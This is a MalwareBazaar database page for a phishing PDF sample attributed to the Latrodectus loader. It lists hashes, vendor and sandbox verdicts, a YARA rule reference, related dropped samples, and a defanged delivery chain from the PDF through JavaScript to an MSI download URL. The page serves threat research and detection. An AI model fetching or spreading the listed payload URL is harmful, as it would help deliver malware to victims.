MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 2f7c4b3bddfcdd2992151c83f85d23fcb886035fb8f477e6c1caba134420bf2e. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Latrodectus


Vendor detections: 7


Intelligence 7 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 2f7c4b3bddfcdd2992151c83f85d23fcb886035fb8f477e6c1caba134420bf2e
SHA3-384 hash: 129a91000db74530605349f4b1f55e0768846c2e8ba9223b021928366c70ca940437219c27487a850c8bb59da05691df
SHA1 hash: 87d57e35c6c2b224056a65a86ca565fa116702c7
MD5 hash: c48c883ccf4b2e18e23e576bbc8c6bba
humanhash: winner-illinois-salami-grey
File name:doc_inv_09-12#965.pdf
Download: download sample
Signature Latrodectus
Create hunting rule
File size:355'012 bytes
First seen:2024-09-12 19:37:51 UTC
Last seen:Never
File type: pdf
MIME type:application/pdf
ssdeep 6144:tX3wNpjXAqv4pR68jNGiG8q7+RoyS2+F8H0vZDZwFQ/msuWG5QJI/C:tHwN5H4pRZjBGyS2+F8QlZ5gWBqC
TLSH T1C7749E57A5F370DBE14884612704F43DA2D829BF53A259DC0DF8F90075AAFA13EBE189
Magika pdf
Reporter k3dg3___
Tags:Latrodectus pdf


Avatar
k3dg3
PDF > JS > hxxp://193.203.203.40/vfs.msi

Intelligence

File Origin
# of uploads :
1
# of downloads :
294
Origin country :
US US
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.PDF.PhishingX-gen.21476.24019.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
81.4%
Link:
https://cyber-fortress.com/docs/result/index.php?id=66e3432276bc4542b04988ef
Tags:
Execution Infostealer Network Ransomware Stealth
Result
Verdict:
Clean
File Type:
PDF File
Link:
https://app.docguard.net/2f7c4b3bddfcdd2992151c83f85d23fcb886035fb8f477e6c1caba134420bf2e/results/dashboard
Verdict:
Unknown
Threat level:
  2.5/10
Confidence:
89%
Tags:
action
Link:
https://www.filescan.io/uploads/66e343213b1017a83adb4f72/reports/c0e5d57c-3cd3-4f74-bcc9-721f982cbdac/overview
Verdict:
Suspicious
Link:
https://www.hybrid-analysis.com/sample/2f7c4b3bddfcdd2992151c83f85d23fcb886035fb8f477e6c1caba134420bf2e
Gathering data
Result
Verdict:
UNKNOWN
Details
Document With Few Pages
Document contains between one and three pages of content. Most malicious documents are sparse in page count.
Result
Threat name:
n/a
Detection:
malicious
Classification:
phis
Score:
48 / 100
Link:
https://www.joesandbox.com/analysis/1510391
Signature
AI detected landing page (webpage, office document or email)
Suspicious PDF detected (based on various text indicators)
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1510391 Sample: doc_inv_09-12#965.pdf Startdate: 12/09/2024 Architecture: WINDOWS Score: 48 38 x1.i.lencr.org 2->38 48 Suspicious PDF detected (based on various text indicators) 2->48 50 AI detected landing page (webpage, office document or email) 2->50 8 chrome.exe 62 2->8         started        12 Acrobat.exe 17 70 2->12         started        14 Acrobat.exe 30 44 2->14         started        signatures3 process4 dnsIp5 42 192.168.2.17 unknown unknown 8->42 44 192.168.2.4 unknown unknown 8->44 46 2 other IPs or domains 8->46 28 C:\Windows\SystemTemp\...\widevinecdm.dll, PE32+ 8->28 dropped 30 C:\Windows\...behaviorgraphoogle.Widevine.CDM.dll, PE32+ 8->30 dropped 16 chrome.exe 8->16         started        19 AcroCEF.exe 109 12->19         started        21 AcroCEF.exe 31 14->21         started        file6 process7 dnsIp8 32 maxxtyre.com.br 198.58.102.144, 443, 54090 LINODE-APLinodeLLCUS United States 16->32 34 www.lindo.com 23.235.207.143, 443, 54094, 65399 INMOTI-1US United States 16->34 36 3 other IPs or domains 16->36 23 AcroCEF.exe 6 19->23         started        26 AcroCEF.exe 21->26         started        process9 dnsIp10 40 23.195.92.153, 443, 49718 AKAMAI-ASUS United States 23->40
Score:
94%
Verdict:
Malware
File Type:
PDF
Link:
https://malprob.io/report/2f7c4b3bddfcdd2992151c83f85d23fcb886035fb8f477e6c1caba134420bf2e
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/2f7c4b3bddfcdd2992151c83f85d23fcb886035fb8f477e6c1caba134420bf2e/
Threat name:
Win32.Trojan.Vigorf
Create hunting rule
Status:
Malicious
First seen:
2024-09-12 19:38:08 UTC
File Type:
Document
Extracted files:
1
AV detection:
7 of 24 (29.17%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=f56ewo657tosteqvdsb7qxjd7s4ima27xd2hpzwbzk5bgrbax4xa._file
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
0.70
Link:
https://yomi.yoroi.company/submissions/2f7c4b3bddfcdd2992151c83f85d23fcb886035fb8f477e6c1caba134420bf2e

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Detect_APT29_WINELOADER_Backdoor
Create hunting rule
Author:daniyyell
Description:Detects APT29's WINELOADER backdoor variant used in phishing campaigns, this rule also detect bad pdf,shtml,htm and vbs or maybe more depends
Reference:https://cloud.google.com/blog/topics/threat-intelligence/apt29-wineloader-german-political-parties

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Malspam

Latrodectus

pdf 2f7c4b3bddfcdd2992151c83f85d23fcb886035fb8f477e6c1caba134420bf2e

(this sample)

Latrodectus

Executable exe 2333dd858fc40899a1bff3fb39fbc0b4e65a864bfd4eb73c26b48aaddcca7061

Latrodectus

Microsoft Software Installer (MSI) msi f60c7e2cd7078584e1fb2eacd6270c314f1e23f76a4cd78c5d13eec215f0e41c

GuLoader

Java Script (JS) js 6ed4c0b2e67a048fea0163a19588d4cf3ae469b62cbf8536cb6c2a213cbfd56f

  
Dropping
SHA256 6ed4c0b2e67a048fea0163a19588d4cf3ae469b62cbf8536cb6c2a213cbfd56f
  
Delivery method
Distributed via e-mail attachment

Comments